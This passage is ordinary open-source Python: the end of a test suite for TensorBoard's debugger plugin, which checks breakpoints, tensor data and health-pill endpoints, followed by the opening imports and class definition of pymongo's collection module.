sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
for _ in range(steps):
session_run_results.append(sess.run(inc_a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def _runTfGroupGraph(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(10, dtype=tf.int32, name='a')
b = tf.Variable(20, dtype=tf.int32, name='b')
d = tf.constant(1, dtype=tf.int32, name='d')
inc_a = tf.assign_add(a, d, name='inc_a')
inc_b = tf.assign_add(b, d, name='inc_b')
inc_ab = tf.group([inc_a, inc_b], name="inc_ab")
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(inc_ab))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testCommAndAckWithoutBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
self.assertGreater(response_data['timestamp'], 0)
self.assertEqual('meta', response_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, response_data['data'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetDeviceNamesAndDebuggerGraph(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
device_names_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_device_names', 'run_key': run_key})
device_names_data = self._deserializeResponse(device_names_response)
self.assertEqual(1, len(device_names_data['device_names']))
device_name = device_names_data['device_names'][0]
graph_response = self._serverGet(
'debugger_graph', {'run_key': run_key, 'device_name': device_name})
self.assertTrue(graph_response.get_data())
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testRetrieveAllGatedGrpcTensors(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
response_data = self._deserializeResponse(comm_response)
run_key = json.dumps(response_data['data']['run_key'])
retrieve_all_response = self._serverGet(
'gated_grpc', {'mode': 'retrieve_all', 'run_key': run_key})
retrieve_all_data = self._deserializeResponse(retrieve_all_response)
self.assertTrue(retrieve_all_data['device_names'])
# No breakpoints have been activated.
self.assertEqual([], retrieve_all_data['breakpoints'])
device_name = retrieve_all_data['device_names'][0]
tensor_names = [item[0] for item
in retrieve_all_data['gated_grpc_tensors'][device_name]]
self.assertItemsEqual(
['a', 'a/read', 'b', 'b/read', 'x', 'c', 'c/read', 'y'], tensor_names)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testActivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoint is remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([['x', 0, 'DebugIdentity']], breakpoints_data)
def testActivateAndDeactivateOneBreakpoint(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Deactivate the breakpoint right away.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'disable'})
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that there is no breakpoint activated.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertEqual([], breakpoints_data)
def testActivateTwoBreakpoints(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([200.0], comm_data['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([1], comm_data['data']['shape'])
self.assertEqual('y', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose([230.0], comm_data['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# Verify that the activated breakpoints are remembered.
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['x', 0, 'DebugIdentity'], ['y', 0, 'DebugIdentity']],
breakpoints_data)
def testCommResponseOmitsLargeSizedTensorValues(self):
session_run_thread, session_run_results = (
self._runSimpleAddMultiplyGraph(10))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'y:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to the breakpiont at x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('float32', comm_data['data']['dtype'])
self.assertEqual([10], comm_data['data']['shape'])
self.assertEqual('x', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
# Verify that the large-sized tensor gets omitted in the comm response.
self.assertEqual(None, comm_data['data']['values'])
# Use the /tensor_data endpoint to obtain the full value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 10], tensor_data['tensor_data'])
# Use the /tensor_data endpoint to obtain the sliced value of x:0.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'x:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertAllClose([[200.0] * 5], tensor_data['tensor_data'])
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0] * 10], session_run_results)
def testMultipleSessionRunsTensorValueFullHistory(self):
session_run_thread, session_run_results = (
self._runMultiStepAssignAddGraph(2))
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0 for the 1st time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor (so far).
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11], 'error': None}, tensor_data)
# Continue to the beginning of the 2nd session.run.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', 'inc_a:0', '']}, comm_data['data'])
# Continue to inc_a:0 for the 2nd time.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 4})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(12.0, comm_data['data']['values'])
# Call /tensor_data to get the full history of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [11, 12], 'error': None}, tensor_data)
# Call /tensor_data to get the latst time index of the inc_a tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'inc_a:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual({'tensor_data': [12], 'error': None}, tensor_data)
# Continue to the end.
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([11.0, 12.0], session_run_results)
def testSetBreakpointOnNoTensorOp(self):
session_run_thread, session_run_results = self._runTfGroupGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data = self._deserializeResponse(comm_response)
self.assertGreater(comm_data['timestamp'], 0)
self.assertEqual('meta', comm_data['type'])
self.assertEqual({'run_key': ['', '', 'inc_ab']}, comm_data['data'])
# Activate breakpoint for inc_a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for inc_ab.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'inc_ab', 'output_slot': -1,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Continue to inc_a:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('int32', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('inc_a', comm_data['data']['node_name'])
self.assertEqual(0, comm_data['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data['data']['debug_op'])
self.assertAllClose(11.0, comm_data['data']['values'])
# Continue to the end. The breakpoint at inc_ab should not have blocked
# the execution, due to the fact that inc_ab is a tf.group op that produces
# no output.
self._serverGet('ack')
session_run_thread.join()
self.assertEqual([None], session_run_results)
breakpoints_response = self._serverGet(
'gated_grpc', {'mode': 'breakpoints'})
breakpoints_data = self._deserializeResponse(breakpoints_response)
self.assertItemsEqual(
[['inc_a', 0, 'DebugIdentity'], ['inc_ab', -1, 'DebugIdentity']],
breakpoints_data)
def testCommDataCanBeServedToMultipleClients(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
comm_response = self._serverGet('comm', {'pos': 1})
comm_data_1 = self._deserializeResponse(comm_response)
# Activate breakpoint for x:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Activate breakpoint for y:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'y', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
# Proceed to breakpoint x:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data_2 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_2['timestamp'], 0)
self.assertEqual('tensor', comm_data_2['type'])
self.assertEqual('float32', comm_data_2['data']['dtype'])
self.assertEqual([1], comm_data_2['data']['shape'])
self.assertEqual('x', comm_data_2['data']['node_name'])
self.assertEqual(0, comm_data_2['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_2['data']['debug_op'])
self.assertAllClose([200.0], comm_data_2['data']['values'])
# Proceed to breakpoint y:0.
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 3})
comm_data_3 = self._deserializeResponse(comm_response)
self.assertGreater(comm_data_3['timestamp'], 0)
self.assertEqual('tensor', comm_data_3['type'])
self.assertEqual('float32', comm_data_3['data']['dtype'])
self.assertEqual([1], comm_data_3['data']['shape'])
self.assertEqual('y', comm_data_3['data']['node_name'])
self.assertEqual(0, comm_data_3['data']['output_slot'])
self.assertEqual('DebugIdentity', comm_data_3['data']['debug_op'])
self.assertAllClose([230.0], comm_data_3['data']['values'])
# Proceed to the end of the Session.run().
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
# A 2nd client requests for comm data at positions 1, 2 and 3 again.
comm_response = self._serverGet('comm', {'pos': 1})
self.assertEqual(comm_data_1, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 2})
self.assertEqual(comm_data_2, self._deserializeResponse(comm_response))
comm_response = self._serverGet('comm', {'pos': 3})
self.assertEqual(comm_data_3, self._deserializeResponse(comm_response))
def testInvalidBreakpointStateLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid state ('bad_state') when setting a breakpoint state.
response = self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'bad_state'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized new state for x:0:DebugIdentity: bad_state',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testInvalidModeArgForGatedGrpcRouteLeadsTo400Response(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
# Use an invalid mode argument ('bad_mode') when calling the 'gated_grpc'
# endpoint.
response = self._serverGet(
'gated_grpc',
{'mode': 'bad_mode', 'node_name': 'x', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'},
expected_status_code=400)
data = self._deserializeResponse(response)
self.assertEqual('Unrecognized mode for the gated_grpc route: bad_mode',
data['error'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testDebuggerHostAndGrpcPortEndpoint(self):
response = self._serverGet('debugger_grpc_host_port')
response_data = self._deserializeResponse(response)
self.assertTrue(response_data['host'])
self.assertEqual(self._debugger_port, response_data['port'])
def testGetSourceFilePaths(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
source_paths_response = self._serverGet('source_code', {'mode': 'paths'})
response_data = self._deserializeResponse(source_paths_response)
self.assertIn(__file__, response_data['paths'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceFileContentWithValidFilePath(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
file_content_response = self._serverGet(
'source_code', {'mode': 'content', 'file_path': __file__})
response_data = self._deserializeResponse(file_content_response)
# Verify that the content of this file is included.
self.assertTrue(response_data['content'][__file__])
# Verify that for the lines of the file that create TensorFlow ops, the list
# of op names and their stack heights are included.
op_linenos = collections.defaultdict(set)
for lineno in response_data['lineno_to_op_name_and_stack_pos']:
self.assertGreater(int(lineno), 0)
for op_name, stack_pos in response_data[
'lineno_to_op_name_and_stack_pos'][lineno]:
op_linenos[op_name].add(lineno)
self.assertGreaterEqual(stack_pos, 0)
self.assertTrue(op_linenos['a'])
self.assertTrue(op_linenos['a/Assign'])
self.assertTrue(op_linenos['a/initial_value'])
self.assertTrue(op_linenos['a/read'])
self.assertTrue(op_linenos['b'])
self.assertTrue(op_linenos['b/Assign'])
self.assertTrue(op_linenos['b/initial_value'])
self.assertTrue(op_linenos['b/read'])
self.assertTrue(op_linenos['c'])
self.assertTrue(op_linenos['c/Assign'])
self.assertTrue(op_linenos['c/initial_value'])
self.assertTrue(op_linenos['c/read'])
self.assertTrue(op_linenos['x'])
self.assertTrue(op_linenos['y'])
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def testGetSourceOpTraceback(self):
session_run_thread, session_run_results = self._runSimpleAddMultiplyGraph()
self._serverGet('comm', {'pos': 1})
for op_name in ('a', 'b', 'c', 'x', 'y'):
op_traceback_reponse = self._serverGet(
'source_code', {'mode': 'op_traceback', 'op_name': op_name})
response_data = self._deserializeResponse(op_traceback_reponse)
found_current_file = False
for file_path, lineno in response_data['op_traceback'][op_name]:
self.assertGreater(lineno, 0)
if file_path == __file__:
found_current_file = True
break
self.assertTrue(found_current_file)
self._serverGet('ack')
session_run_thread.join()
self.assertAllClose([[230.0]], session_run_results)
def _runInitializer(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable([10.0] * 10, name='a')
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
# Run the initializer with a debugger-wrapped tf.Session.
session_run_results.append(sess.run(a.initializer))
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testTensorDataForUnitializedTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
self.assertEqual(2, len(session_run_results))
self.assertIsNone(session_run_results[0])
self.assertAllClose([10.0] * 10, session_run_results[1])
# Get tensor data without slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 10, tensor_data[1])
# Get tensor data with slicing.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': ':',
'mapping': '',
'slicing': '[:5]'})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data']
self.assertEqual(2, len(tensor_data))
self.assertIsNone(tensor_data[0])
self.assertAllClose([10.0] * 5, tensor_data[1])
def testCommDataForUninitializedTensorIsHandledCorrectly(self):
session_run_thread, _ = self._runInitializer()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('Uninitialized', comm_data['data']['dtype'])
self.assertEqual('Uninitialized', comm_data['data']['shape'])
self.assertEqual('N/A', comm_data['data']['values'])
self.assertEqual(
'a/(a)', comm_data['data']['maybe_base_expanded_node_name'])
self._serverGet('ack')
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
def _runHealthPillNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
a = tf.Variable(
[np.nan, np.inf, np.inf, -np.inf, -np.inf, -np.inf, 10, 20, 30],
dtype=tf.float32, name='a')
session_run_results.append(sess.run(a.initializer))
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(a))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testHealthPill(self):
session_run_thread, _ = self._runHealthPillNetwork()
# Activate breakpoint for a:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'a', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
session_run_thread.join()
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'a:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertIsNone(tensor_data['error'])
tensor_data = tensor_data['tensor_data'][0]
self.assertAllClose(1.0, tensor_data[0]) # IsInitialized.
self.assertAllClose(9.0, tensor_data[1]) # Total count.
self.assertAllClose(1.0, tensor_data[2]) # NaN count.
self.assertAllClose(3.0, tensor_data[3]) # -Infinity count.
self.assertAllClose(0.0, tensor_data[4]) # Finite negative count.
self.assertAllClose(0.0, tensor_data[5]) # Zero count.
self.assertAllClose(3.0, tensor_data[6]) # Positive count.
self.assertAllClose(2.0, tensor_data[7]) # +Infinity count.
self.assertAllClose(10.0, tensor_data[8]) # Min.
self.assertAllClose(30.0, tensor_data[9]) # Max.
self.assertAllClose(20.0, tensor_data[10]) # Mean.
self.assertAllClose(
np.var([10.0, 20.0, 30.0]), tensor_data[11]) # Variance.
def _runAsciiStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable('abc', name='str1')
str2 = tf.Variable('def', name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testAsciiStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runAsciiStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('string', comm_data['data']['dtype'])
self.assertEqual([], comm_data['data']['shape'])
self.assertEqual('abc', comm_data['data']['values'])
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertEqual(b"abcdef", session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(['abc'], tensor_data['tensor_data'])
# Get the health pill of a string tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
def _runBinaryStringNetwork(self):
session_run_results = []
def session_run_job():
with tf.Session() as sess:
str1 = tf.Variable([b'\x01' * 3, b'\x02' * 3], name='str1')
str2 = tf.Variable([b'\x03' * 3, b'\x04' * 3], name='str2')
str_concat = tf.add(str1, str2, name='str_concat')
sess.run(tf.global_variables_initializer())
sess = tf_debug.TensorBoardDebugWrapperSession(sess, self._debugger_url)
session_run_results.append(sess.run(str_concat))
session_run_thread = threading.Thread(target=session_run_job)
session_run_thread.start()
return session_run_thread, session_run_results
def testBinaryStringTensorIsHandledCorrectly(self):
session_run_thread, session_run_results = self._runBinaryStringNetwork()
# Activate breakpoint for str1:0.
self._serverGet(
'gated_grpc',
{'mode': 'set_state', 'node_name': 'str1', 'output_slot': 0,
'debug_op': 'DebugIdentity', 'state': 'break'})
self._serverGet('ack')
self._serverGet('ack')
comm_response = self._serverGet('comm', {'pos': 2})
comm_data = self._deserializeResponse(comm_response)
self.assertEqual('tensor', comm_data['type'])
self.assertEqual('string', comm_data['data']['dtype'])
self.assertEqual([2], comm_data['data']['shape'])
self.assertEqual(2, len(comm_data['data']['values']))
self.assertEqual(
b'=01' * 3, tf.compat.as_bytes(comm_data['data']['values'][0]))
self.assertEqual(
b'=02' * 3, tf.compat.as_bytes(comm_data['data']['values'][1]))
self.assertEqual(
'str1/(str1)', comm_data['data']['maybe_base_expanded_node_name'])
session_run_thread.join()
self.assertEqual(1, len(session_run_results))
self.assertAllEqual(
np.array([b'\x01\x01\x01\x03\x03\x03', b'\x02\x02\x02\x04\x04\x04'],
dtype=np.object),
session_run_results[0])
# Get the value of a tensor without mapping.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': '',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual(2, len(tensor_data['tensor_data'][0]))
self.assertEqual(
b'=01=01=01', tf.compat.as_bytes(tensor_data['tensor_data'][0][0]))
self.assertEqual(
b'=02=02=02', tf.compat.as_bytes(tensor_data['tensor_data'][0][1]))
# Get the health pill of a string tensor.
tensor_response = self._serverGet(
'tensor_data',
{'watch_key': 'str1:0:DebugIdentity',
'time_indices': '-1',
'mapping': 'health-pill',
'slicing': ''})
tensor_data = self._deserializeResponse(tensor_response)
self.assertEqual(None, tensor_data['error'])
self.assertEqual([None], tensor_data['tensor_data'])
if __name__ == "__main__":
tf.test.main()
|
collection.py | # Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
